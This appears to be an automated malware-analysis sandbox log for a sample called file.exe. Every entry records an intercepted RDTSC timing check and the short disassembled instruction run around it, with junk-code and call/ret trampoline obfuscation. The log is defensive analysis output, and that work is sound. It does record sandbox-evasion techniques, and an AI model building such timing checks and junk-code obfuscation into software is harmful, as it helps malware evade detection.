Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A172E3 second address: A172E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A172E9 second address: A1731D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F45412F2583h 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F45412F2589h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E996C second address: 9E9973 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E9973 second address: 9E99CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 pushad 0x00000007 jmp 00007F45412F2587h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f pushad 0x00000010 jmp 00007F45412F2587h 0x00000015 jnc 00007F45412F2576h 0x0000001b jmp 00007F45412F2589h 0x00000020 popad 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E99CF second address: 9E99D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A1574A second address: A15755 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push esi 0x00000006 pop esi 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A15755 second address: A1575C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A158A2 second address: A158A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A15B59 second address: A15B5E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A15B5E second address: A15B64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A15CEB second address: A15CF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A15FE8 second address: A15FEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A15FEC second address: A16012 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F4540B7FD26h 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A16012 second address: A16017 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A163E7 second address: A163F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F4540B7FD16h 0x0000000a push edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A163F5 second address: A163FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A163FA second address: A163FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A163FF second address: A16405 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A1716F second address: A17175 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A17175 second address: A17179 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A1CB60 second address: A1CB65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A1CB65 second address: A1CB6A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A1CB6A second address: A1CB70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A21B75 second address: A21B80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A22270 second address: A22293 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F4540B7FD29h 0x0000000a pushad 0x0000000b push edi 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A22293 second address: A22299 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A22299 second address: A222A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A257F1 second address: A257FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 pushad 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A25913 second address: A2591B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A2591B second address: A25939 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 popad 0x00000008 mov eax, dword ptr [eax] 0x0000000a jmp 00007F45412F257Ch 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 push ecx 0x00000014 push ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A25A29 second address: A25A2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A25C3D second address: A25C4F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45412F257Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A25C4F second address: A25C55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A25C55 second address: A25C59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A25FCE second address: A25FD3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A2644F second address: A26472 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45412F2585h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jbe 00007F45412F2584h 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A26472 second address: A26478 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A26628 second address: A2664C instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F45412F2576h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push edx 0x0000000e pop edx 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 pushad 0x00000013 pushad 0x00000014 js 00007F45412F2576h 0x0000001a je 00007F45412F2576h 0x00000020 popad 0x00000021 push edi 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A269F2 second address: A26A01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edi 0x00000007 jbe 00007F4540B7FD1Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A26F21 second address: A26F27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A29362 second address: A293BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 jno 00007F4540B7FD18h 0x0000000f push ecx 0x00000010 push edx 0x00000011 pop edx 0x00000012 pop ecx 0x00000013 popad 0x00000014 nop 0x00000015 cmc 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push ebx 0x0000001b call 00007F4540B7FD18h 0x00000020 pop ebx 0x00000021 mov dword ptr [esp+04h], ebx 0x00000025 add dword ptr [esp+04h], 0000001Bh 0x0000002d inc ebx 0x0000002e push ebx 0x0000002f ret 0x00000030 pop ebx 0x00000031 ret 0x00000032 jmp 00007F4540B7FD1Fh 0x00000037 push 00000000h 0x00000039 xor si, 578Fh 0x0000003e push eax 0x0000003f push eax 0x00000040 push edx 0x00000041 pushad 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A293BB second address: A293D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F45412F2585h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A29B4E second address: A29B54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9EEA05 second address: 9EEA0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A2A594 second address: A2A598 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A2D60A second address: A2D614 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F45412F2576h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A2D614 second address: A2D61E instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F4540B7FD1Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A2F588 second address: A2F593 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A2F593 second address: A2F59F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F4540B7FD16h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A2F59F second address: A2F5DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 push edi 0x00000008 jmp 00007F45412F2588h 0x0000000d pop edi 0x0000000e jmp 00007F45412F2585h 0x00000013 pushad 0x00000014 jl 00007F45412F2576h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A2C834 second address: A2C83E instructions: 0x00000000 rdtsc 0x00000002 jng 00007F4540B7FD1Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A2F5DE second address: A2F5E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A33300 second address: A33305 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A352E8 second address: A352F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F45412F2576h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3626C second address: A36272 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A36272 second address: A362EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45412F2584h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c or bx, E132h 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push ecx 0x00000016 call 00007F45412F2578h 0x0000001b pop ecx 0x0000001c mov dword ptr [esp+04h], ecx 0x00000020 add dword ptr [esp+04h], 00000014h 0x00000028 inc ecx 0x00000029 push ecx 0x0000002a ret 0x0000002b pop ecx 0x0000002c ret 0x0000002d mov edi, dword ptr [ebp+122D1EADh] 0x00000033 jnp 00007F45412F257Bh 0x00000039 push 00000000h 0x0000003b push 00000000h 0x0000003d push edi 0x0000003e call 00007F45412F2578h 0x00000043 pop edi 0x00000044 mov dword ptr [esp+04h], edi 0x00000048 add dword ptr [esp+04h], 0000001Bh 0x00000050 inc edi 0x00000051 push edi 0x00000052 ret 0x00000053 pop edi 0x00000054 ret 0x00000055 push eax 0x00000056 push ecx 0x00000057 push ebx 0x00000058 push eax 0x00000059 push edx 0x0000005a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A334C6 second address: A334CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A36456 second address: A3645A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3645A second address: A36484 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 jmp 00007F4540B7FD26h 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A37461 second address: A374FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45412F2585h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ecx 0x0000000b jne 00007F45412F2578h 0x00000011 pop ecx 0x00000012 nop 0x00000013 push dword ptr fs:[00000000h] 0x0000001a push eax 0x0000001b xor ebx, dword ptr [ebp+122D223Dh] 0x00000021 pop edi 0x00000022 mov dword ptr fs:[00000000h], esp 0x00000029 push 00000000h 0x0000002b push esi 0x0000002c call 00007F45412F2578h 0x00000031 pop esi 0x00000032 mov dword ptr [esp+04h], esi 0x00000036 add dword ptr [esp+04h], 00000016h 0x0000003e inc esi 0x0000003f push esi 0x00000040 ret 0x00000041 pop esi 0x00000042 ret 0x00000043 mov ebx, 3D03E104h 0x00000048 mov eax, dword ptr [ebp+122D0D41h] 0x0000004e push 00000000h 0x00000050 push edi 0x00000051 call 00007F45412F2578h 0x00000056 pop edi 0x00000057 mov dword ptr [esp+04h], edi 0x0000005b add dword ptr [esp+04h], 0000001Ah 0x00000063 inc edi 0x00000064 push edi 0x00000065 ret 0x00000066 pop edi 0x00000067 ret 0x00000068 mov edi, dword ptr [ebp+122D369Ah] 0x0000006e push FFFFFFFFh 0x00000070 mov edi, 3034A626h 0x00000075 push eax 0x00000076 push eax 0x00000077 push edx 0x00000078 push ebx 0x00000079 push eax 0x0000007a pop eax 0x0000007b pop ebx 0x0000007c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3831D second address: A38332 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F4540B7FD1Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A374FB second address: A37501 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A384CF second address: A384D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3A452 second address: A3A458 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3C43F second address: A3C475 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F4540B7FD1Ch 0x00000008 jl 00007F4540B7FD16h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp], eax 0x00000013 sub edi, dword ptr [ebp+1247C86Fh] 0x00000019 push 00000000h 0x0000001b jmp 00007F4540B7FD1Dh 0x00000020 push 00000000h 0x00000022 mov edi, dword ptr [ebp+122D1C7Ch] 0x00000028 push eax 0x00000029 push esi 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3C475 second address: A3C479 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3D4B5 second address: A3D4BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3D4BA second address: A3D53F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45412F2581h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push ecx 0x0000000c jp 00007F45412F2576h 0x00000012 pop ecx 0x00000013 jno 00007F45412F257Ch 0x00000019 popad 0x0000001a nop 0x0000001b push 00000000h 0x0000001d push 00000000h 0x0000001f push eax 0x00000020 call 00007F45412F2578h 0x00000025 pop eax 0x00000026 mov dword ptr [esp+04h], eax 0x0000002a add dword ptr [esp+04h], 0000001Dh 0x00000032 inc eax 0x00000033 push eax 0x00000034 ret 0x00000035 pop eax 0x00000036 ret 0x00000037 push 00000000h 0x00000039 push 00000000h 0x0000003b push esi 0x0000003c call 00007F45412F2578h 0x00000041 pop esi 0x00000042 mov dword ptr [esp+04h], esi 0x00000046 add dword ptr [esp+04h], 0000001Ch 0x0000004e inc esi 0x0000004f push esi 0x00000050 ret 0x00000051 pop esi 0x00000052 ret 0x00000053 xor dword ptr [ebp+122D276Ah], edi 0x00000059 push eax 0x0000005a pushad 0x0000005b pushad 0x0000005c push eax 0x0000005d push edx 0x0000005e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3B579 second address: A3B57E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3C63F second address: A3C652 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jo 00007F45412F257Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3C652 second address: A3C656 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3F5B0 second address: A3F5B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3F5B4 second address: A3F5BA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A4156E second address: A41573 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A4369E second address: A436D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4540B7FD23h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F4540B7FD26h 0x00000012 push eax 0x00000013 pop eax 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A436D1 second address: A436E3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 pushad 0x0000000a popad 0x0000000b jo 00007F45412F2576h 0x00000011 pop ebx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A4D25D second address: A4D278 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push ebx 0x00000006 jmp 00007F4540B7FD1Dh 0x0000000b js 00007F4540B7FD1Eh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A4CE12 second address: A4CE16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A4CE16 second address: A4CE54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F4540B7FD16h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d jmp 00007F4540B7FD28h 0x00000012 jmp 00007F4540B7FD1Eh 0x00000017 pop ebx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b pop eax 0x0000001c jc 00007F4540B7FD16h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A4CE54 second address: A4CE74 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 jmp 00007F45412F2585h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A525D9 second address: A5261B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4540B7FD23h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jo 00007F4540B7FD29h 0x00000010 jmp 00007F4540B7FD23h 0x00000015 mov eax, dword ptr [esp+04h] 0x00000019 pushad 0x0000001a jng 00007F4540B7FD18h 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5261B second address: A52643 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a jnp 00007F45412F2586h 0x00000010 jmp 00007F45412F2580h 0x00000015 push eax 0x00000016 push edx 0x00000017 jo 00007F45412F2576h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A52643 second address: A52675 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4540B7FD24h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 jmp 00007F4540B7FD1Fh 0x00000016 push eax 0x00000017 pop eax 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A52675 second address: A5267F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F45412F2576h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A528C2 second address: A528C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
